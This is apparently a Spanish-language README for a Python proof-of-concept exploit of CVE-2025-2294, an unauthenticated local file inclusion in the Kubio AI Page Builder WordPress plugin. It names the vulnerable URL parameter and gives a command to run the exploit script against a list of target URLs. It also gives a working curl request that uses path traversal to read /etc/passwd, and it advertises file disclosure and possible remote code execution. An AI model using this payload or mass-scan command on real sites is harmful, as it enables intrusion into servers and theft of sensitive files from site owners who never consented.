
PoC en Python para CVE-2025-2294, una inclusión local de archivos no autenticada en el plugin de WordPress Kubio AI Page Builder (≤2.5.1), que demuestra divulgación arbitraria de archivos y posible ejecución remota de código.
CVE-2025-2294 es una vulnerabilidad crítica 🔥 de Inclusión de Archivos Locales (LFI) que afecta al plugin Kubio AI Page Builder para WordPress (versiones hasta la 2.5.1 inclusive). Este fallo permite a atacantes remotos no autenticados 👾 incluir archivos arbitrarios en el servidor a través del parámetro de URL __kubio-site-edit-iframe-classic-template.
La explotación de esta vulnerabilidad puede dar lugar a la divulgación de archivos sensibles 📂, ejecución remota de código 💥 y compromiso total del sistema 💀.
Muhammad Nizar — Investigador de Seguridad 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️
¡No dudes en contactarme para preguntas o colaboración! 🤝
Ejecuta el script de explotación con una lista de URLs objetivo:
python3 lfi.py -l list.txt
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"